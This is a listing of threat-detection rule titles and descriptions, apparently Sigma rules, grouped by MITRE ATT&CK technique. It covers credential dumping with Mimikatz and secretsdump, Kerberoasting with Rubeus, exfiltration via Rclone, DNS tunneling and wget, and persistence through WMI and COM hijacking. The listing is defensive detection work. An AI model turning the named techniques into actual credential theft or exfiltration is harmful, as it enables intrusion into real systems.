  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
attack.t1069.001 - 17 rules
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Local Groups Discovery - Linux - Level: low
    Description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
  • Local Groups Discovery - MacOs - Level: informational
    Description: Detects enumeration of local system groups
  • BloodHound Collection Files - Level: high
    Description: Detects default file names outputted by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule - Level: low
    Description: Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
  • Suspicious Get Local Groups Information - Level: low
    Description: Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Suspicious Get Information for SMB Share - PowerShell Module - Level: low
    Description: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock - Level: low
    Description: Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
  • Suspicious Get Local Groups Information - PowerShell - Level: low
    Description: Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Suspicious Get Information for SMB Share - Level: low
    Description: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Permission Check Via Accesschk.EXE - Level: medium
    Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by Sysinternals that is often abused by attackers to verify process privileges
  • Local Groups Reconnaissance Via Wmic.EXE - Level: low
    Description: Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1560.001 - 17 rules
  • Data Compressed - Level: low
    Description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Disk Image Mounting Via Hdiutil - MacOS - Level: medium
    Description: Detects the execution of the hdiutil utility in order to mount disk images.
  • Cisco Stage Data - Level: low
    Description: Various protocols may be used to put data on the device for exfiltration or infiltration
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP - Level: medium
    Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
  • 7Zip Compressing Dump Files - Level: medium
    Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
  • Suspicious Manipulation Of Default Accounts Via Net.EXE - Level: high
    Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest', for example enabling or disabling the accounts or changing their password.
  • Rar Usage with Password and Compression Level - Level: high
    Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
  • Files Added To An Archive Using Rar.EXE - Level: low
    Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Compressed File Creation Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
  • Compressed File Extraction Via Tar.EXE - Level: low
    Description: Detects execution of "tar.exe" in order to extract a compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
  • Winrar Compressing Dump Files - Level: medium
    Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
  • Winrar Execution in Non-Standard Folder - Level: medium
    Description: Detects a suspicious winrar execution in a folder which is not the default installation folder
  • Compress Data and Lock With Password for Exfiltration With WINZIP - Level: medium
    Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Password Protected Compressed File Extraction Via 7Zip - Level: low
    Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
  • Potentially Suspicious Compression Tool Parameters - Level: medium
    Description: Detects potentially suspicious command line arguments of common data compression tools
  • Potential Exfiltration of Compressed Files - Level: medium
    Description: This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body
attack.t1070.004 - 16 rules
  • Sysinternals SDelete Registry Keys - Level: medium
    Description: A general detection that triggers on the creation or modification of .*\Software\Sysinternals\SDelete registry keys, an indicator of the use of the Sysinternals SDelete tool.
  • File Deletion - Level: informational
    Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
  • Cisco File Deletion - Level: medium
    Description: See what files are being deleted from flash file systems
  • Backup Catalog Deleted - Level: medium
    Description: Detects backup catalog deletions
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • Prefetch File Deleted - Level: high
    Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
  • TeamViewer Log File Deleted - Level: low
    Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
  • File Deleted Via Sysinternals SDelete - Level: medium
    Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
  • ADS Zone.Identifier Deleted By Uncommon Application - Level: medium
    Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • File Deletion Via Del - Level: low
    Description: Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
  • Greedy File Deletion Using Del - Level: medium
    Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
  • Potentially Suspicious Ping/Copy Command Combination - Level: medium
    Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
  • Suspicious Ping/Del Command Combination - Level: high
    Description: Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It is used, for example, to hide the file responsible for the initial infection.
  • Directory Removal Via Rmdir - Level: low
    Description: Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
  • ADS Zone.Identifier Deleted - Level: low
    Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • Use Of Remove-Item to Delete File - ScriptBlock - Level: low
    Description: Detects PowerShell Remove-Item with -Path used to delete a file or a folder with "-Recurse".
attack.t1558.003 16
  • Kerberos Network Traffic RC4 Ticket Encryption - Level: medium
    Description: Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting.
  • Kerberoasting Activity - Initial Query - Level: medium
    Description: This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
  • Register new Logon Process by Rubeus - Level: high
    Description: Detects potential use of Rubeus via registered new trusted logon process
  • Uncommon Outbound Kerberos Connection - Security - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • Suspicious Kerberos RC4 Ticket Encryption - Level: medium
    Description: Detects service ticket requests using RC4 encryption type
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' - Level: high
    Description: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.
  • Potential CVE-2021-42287 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
  • No Suitable Encryption Key Found For Generating Kerberos Ticket - Level: low
    Description: Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • Request A Single Ticket via PowerShell - Level: high
    Description: Detects use of native PowerShell Identity modules to query the domain and extract the Service Principal Names for a single computer. This behavior is typically used during a Kerberoasting or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
  • HackTool - KrbRelay Execution - Level: high
    Description: Detects the use of KrbRelay, a Kerberos relaying tool
  • HackTool - KrbRelayUp Execution - Level: high
    Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
  • HackTool - RemoteKrbRelay Execution - Level: high
    Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
  • Potential SPN Enumeration Via Setspn.EXE - Level: medium
    Description: Detects service principal name (SPN) enumeration used for Kerberoasting
  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
attack.t1048.003 15
  • Data Exfiltration with Wget - Level: medium
    Description: Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
  • Suspicious DNS Query with B64 Encoded String - Level: medium
    Description: Detects suspicious DNS queries using base64 encoding
  • WebDav Put Request - Level: low
    Description: A general detection for the WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.
  • Suspicious Outbound SMTP Connections - Level: medium
    Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • PowerShell ICMP Exfiltration - Level: medium
    Description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
  • Suspicious WebDav Client Execution Via Rundll32.EXE - Level: high
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
  • WebDav Client Execution Via Rundll32.EXE - Level: medium
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet - Level: medium
    Description: Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • Possible DNS Tunneling - Level: high
    Description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
  • High DNS Bytes Out - Level: medium
    Description: High amount of DNS query bytes from a host within a short period of time.
  • High NULL Records Requests Rate - Level: medium
    Description: Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution
  • High DNS Requests Rate - Level: medium
    Description: High number of DNS requests from a host within a short period of time.
  • High TXT Records Requests Rate - Level: medium
    Description: Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution
  • High DNS Bytes Out - Firewall - Level: medium
    Description: High amount of DNS query bytes from a host within a short period of time.
  • High DNS Requests Rate - Firewall - Level: medium
    Description: High number of DNS requests from a host within a short period of time.
attack.t1087.001 14
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Local System Accounts Discovery - Linux - Level: low
    Description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
  • Local System Accounts Discovery - MacOs - Level: low
    Description: Detects enumeration of local system accounts on MacOS.
  • Cisco Collect Data - Level: low
    Description: Collects pertinent data from the configuration files.
  • BloodHound Collection Files - Level: high
    Description: Detects default file names output by the BloodHound collection tool SharpHound.
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check whether the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM).
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Local Accounts Discovery - Level: low
    Description: Detects local account and System Owner/User discovery using operating system utilities.
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1036.005 14
  • Creation Of Pod In System Namespace - Level: medium
    Description: Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a flashplayer update from an unofficial location
  • Files With System DLL Name In Unsuspected Locations - Level: medium
    Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations (outside of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.
  • Files With System Process Name In Unsuspected Locations - Level: medium
    Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
  • Suspicious Files in Default GPO Folder - Level: medium
    Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
  • Potential MsiExec Masquerading - Level: high
    Description: Detects the execution of msiexec.exe from an uncommon directory
  • Suspicious Scheduled Task Creation via Masqueraded XML File - Level: medium
    Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence.
  • Windows Processes Suspicious Parent Directory - Level: low
    Description: Detect suspicious parent processes of well-known Windows processes
  • Suspicious Process Masquerading As SvcHost.EXE - Level: high
    Description: Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
  • Uncommon Svchost Parent Process - Level: medium
    Description: Detects an uncommon svchost parent process
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
  • Lazarus System Binary Masquerading - Level: high
    Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
  • Small Sieve Malware File Indicator Creation - Level: high
    Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
attack.t1136.001 14
  • Creation Of An User Account - Level: medium
    Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
  • Privileged User Has Been Created - Level: high
    Description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
  • Creation Of A Local User Account - Level: low
    Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
  • Cisco Local Accounts - Level: high
    Description: Detects local accounts being created or modified, as well as remote authentication configurations.
  • Hidden Local User Creation - Level: high
    Description: Detects the creation of a local hidden user account which should not happen for event ID 4720.
  • Suspicious Windows ANONYMOUS LOGON Local Account Created - Level: high
    Description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
  • Local User Creation - Level: low
    Description: Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
  • PowerShell Create Local User - Level: medium
    Description: Detects creation of a local user via PowerShell
  • New User Created Via Net.EXE - Level: medium
    Description: Identifies the creation of local users via the net.exe command.
  • New User Created Via Net.EXE With Never Expire Option - Level: high
    Description: Detects creation of local users via the net.exe command with the option "never expire"
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Creation of a Local Hidden User Account by Registry - Level: high
    Description: Sysmon registry detection of a local hidden user account.
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
  • DarkGate - User Created Via Net.EXE - Level: high
    Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
attack.t1021.001 14
  • Publicly Accessible RDP Service - Level: high
    Description: Detects connections from routable IPs to an RDP listener, which is indicative of a publicly-accessible RDP service.
  • Denied Access To Remote Desktop - Level: medium
    Description: This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • RDP Login from Localhost - Level: high
    Description: RDP login with localhost source address may be a tunnelled login
  • Outbound RDP Connections Over Non-Standard Tools - Level: high
    Description: Detects non-standard tools initiating a connection over port 3389, indicating possible lateral movement. An initial baseline is required before using this rule to exclude third-party RDP tooling that you might use.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • New Remote Desktop Connection Initiated Via Mstsc.EXE - Level: medium
    Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
  • Suspicious Plink Port Forwarding - Level: high
    Description: Detects suspicious Plink tunnel port forwarding to a local port
  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE - Level: high
    Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
  • User Added to Remote Desktop Users Group - Level: high
    Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
  • Hermetic Wiper TG Process Patterns - Level: high
    Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
attack.t1069.002 13
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • Reconnaissance Activity - Level: high
    Description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
  • BloodHound Collection Files - Level: high
    Description: Detects default file names output by the BloodHound collection tool SharpHound.
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Group Enumeration With Get-AdGroup - Level: low
    Description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1003.004 12
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL. Based on the SIGMA rule rules/windows/builtin/win_impacket_secretdump.yml.
  • Mimikatz Use - Level: high
    Description: Detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups).
  • DPAPI Domain Backup Key Extraction - Level: high
    Description: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers
  • DPAPI Domain Master Key Backup Attempt - Level: medium
    Description: Detects anyone attempting a backup of the DPAPI Master Key. This event gets generated at the source and not on the Domain Controller.
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL.
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Cred Dump Tools Dropped Files - Level: high
    Description: Detects the creation of files with well-known filenames (parts of credential dumping software or files produced by it).
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • HackTool - Mimikatz Execution - Level: high
    Description: Detects well-known mimikatz command line arguments.
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
attack.t1567.002 12
  • RClone Execution - Level: high
    Description: Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc.
  • Rclone Execution via Command Line or PowerShell - Level: high
    Description: Detects Rclone which is commonly used by ransomware groups for exfiltration
  • Rclone Activity via Proxy - Level: medium
    Description: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
  • DNS Query for Anonfiles.com Domain - DNS Client - Level: high
    Description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
  • DNS Query To MEGA Hosting Website - DNS Client - Level: medium
    Description: Detects DNS queries for subdomains related to MEGA sharing website
  • DNS Query To Ufile.io - DNS Client - Level: low
    Description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
  • DNS Query for Anonfiles.com Domain - Sysmon - Level: high
    Description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
  • DNS Query To MEGA Hosting Website - Level: medium
    Description: Detects DNS queries for subdomains related to MEGA sharing website
  • DNS Query To Ufile.io - Level: low
    Description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
  • Rclone Config File Creation - Level: medium
    Description: Detects Rclone config files being created
  • PUA - Rclone Execution - Level: high
    Description: Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc.
  • APT40 Dropbox Tool User Agent - Level: high
    Description: Detects suspicious user agent string of APT40 Dropbox tool
attack.t1546.003 12
  • WMI Persistence - Security - Level: medium
    Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
  • WMI Persistence - Level: medium
    Description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
  • WMI Persistence - Script Event Consumer File Write - Level: high
    Description: Detects file writes of WMI script event consumer
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load - Level: medium
    Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity.
  • WMI Persistence - Command Line Event Consumer - Level: high
    Description: Detects WMI command line event consumers
  • Powershell WMI Persistence - Level: medium
    Description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
  • New ActiveScriptEventConsumer Created Via Wmic.EXE - Level: high
    Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
  • WMI Backdoor Exchange Transport Agent - Level: critical
    Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
  • WMI Persistence - Script Event Consumer - Level: medium
    Description: Detects WMI script event consumers
  • WMI Event Subscription - Level: medium
    Description: Detects creation of WMI event subscription persistence method
  • Suspicious Encoded Scripts in a WMI Consumer - Level: high
    Description: Detects suspicious encoded payloads in WMI Event Consumers
  • Potential Remote WMI ActiveScriptEventConsumers Activity - Level: medium
    Description: Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine potential lateral movement activity.
attack.t1553.004 11
  • Root Certificate Installed - Level: medium
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Install Root Certificate - Level: low
    Description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
  • Suspicious Package Installed - Linux - Level: medium
    Description: Detects installation of suspicious packages using system installation utilities
  • Cisco Crypto Commands - Level: high
    Description: Shows when private keys are being exported from the device, or when new certificates are installed.
  • Active Directory Certificate Services Denied Certificate Enrollment Request - Level: low
    Description: Detects denied requests by Active Directory Certificate Services. Examples of such denials include issues with permissions on the certificate template or invalid signatures.
  • Root Certificate Installed - PowerShell - Level: medium
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Suspicious X509Enrollment - Ps Script - Level: medium
    Description: Detects use of X509Enrollment
  • New Root Certificate Installed Via CertMgr.EXE - Level: medium
    Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • New Root Certificate Installed Via Certutil.EXE - Level: medium
    Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Root Certificate Installed From Susp Locations - Level: high
    Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
  • Suspicious X509Enrollment - Process Creation - Level: medium
    Description: Detects use of X509Enrollment
attack.t1546.015 11
  • Potential Persistence Via COM Hijacking From Suspicious Locations - Level: high
    Description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location.
  • Potential Persistence Via COM Search Order Hijacking - Level: medium
    Description: Detects potential COM object hijacking leveraging the COM Search Order
  • Suspicious GetTypeFromCLSID ShellExecute - Level: medium
    Description: Detects suspicious PowerShell code that executes COM objects
  • Rundll32 Registered COM Objects - Level: high
    Description: Detects loading of malicious registered COM objects
  • Potential COM Object Hijacking Via TreatAs Subkey - Registry - Level: medium
    Description: Detects COM object hijacking via TreatAs subkey
  • Potential Persistence Using DebugPath - Level: medium
    Description: Detects potential persistence using Appx DebugPath
  • Potential PSFactoryBuffer COM Hijacking - Level: high
